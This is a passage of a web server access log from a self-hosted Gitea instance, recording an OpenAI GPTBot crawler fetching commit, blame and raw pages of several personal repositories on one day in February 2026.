"/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 22656] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:14:09:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 39193] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:14:09:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 9953] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:14:09:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host" [Client 74.7.227.38] [Length 9909] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host" +[17/Feb/2026:14:09:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 9940] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log" +[17/Feb/2026:14:09:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 9911] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log" +[17/Feb/2026:14:09:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 9908] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_error.log" +[17/Feb/2026:14:09:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host" [Client 74.7.227.38] [Length 10125] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host" +[17/Feb/2026:14:09:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11898] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup" +[17/Feb/2026:14:09:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 387788] [Gzip 16.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0" +[17/Feb/2026:14:09:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 15243] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f" +[17/Feb/2026:14:09:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 15250] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f?show-outdated=&style=split&whitespace=show-all" +[17/Feb/2026:14:09:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 15245] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f" +[17/Feb/2026:14:09:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 86383] [Gzip 15.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" +[17/Feb/2026:14:09:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 51967] [Gzip 9.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" +[17/Feb/2026:14:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 212896] [Gzip 13.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8" +[17/Feb/2026:14:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 15244] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f" +[17/Feb/2026:14:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11965] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" +[17/Feb/2026:14:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good2" [Client 74.7.227.38] [Length 20220] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" +[17/Feb/2026:14:10:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/docker-compose.yml" +[17/Feb/2026:14:10:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good" [Client 74.7.227.38] [Length 20242] [Gzip 5.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" +[17/Feb/2026:14:10:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/docker-compose.yml" +[17/Feb/2026:14:10:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11155] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/docker-compose.yml" +[17/Feb/2026:14:10:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.gitignore" [Client 74.7.227.38] [Length 9900] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.gitignore" +[17/Feb/2026:14:10:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17347] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest" +[17/Feb/2026:14:10:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14349] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/my_database.db" +[17/Feb/2026:14:10:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:14:10:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:14:10:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/vite.config.ts" +[17/Feb/2026:14:10:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11240] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/vite.config.ts" +[17/Feb/2026:14:10:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good2" [Client 74.7.227.38] [Length 21810] [Gzip 12.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good2" +[17/Feb/2026:14:10:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/vite.config.ts" +[17/Feb/2026:14:10:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good2" [Client 74.7.227.38] [Length 12530] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good2" +[17/Feb/2026:14:10:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good" [Client 74.7.227.38] [Length 12246] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good" +[17/Feb/2026:14:10:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good" [Client 74.7.227.38] [Length 21658] [Gzip 12.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good" +[17/Feb/2026:14:10:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9911] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:10:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23043] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:10:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:10:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 9926] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:14:10:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py.claude" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py.claude" +[17/Feb/2026:14:10:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js" [Client 74.7.227.38] [Length 10121] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js" +[17/Feb/2026:14:10:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/favicon.ico" [Client 74.7.227.38] [Length 9889] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/favicon.ico" +[17/Feb/2026:14:10:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/database.py" +[17/Feb/2026:14:10:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/database.py" +[17/Feb/2026:14:10:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 10127] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/models.py" +[17/Feb/2026:14:10:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:14:10:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 10129] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:14:10:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:14:10:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/models.py" +[17/Feb/2026:14:10:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js" +[17/Feb/2026:14:10:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" [Client 74.7.227.38] [Length 10106] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" +[17/Feb/2026:14:10:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 43161] [Gzip 20.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/Project%20Planning-1.md" +[17/Feb/2026:14:10:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11960] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 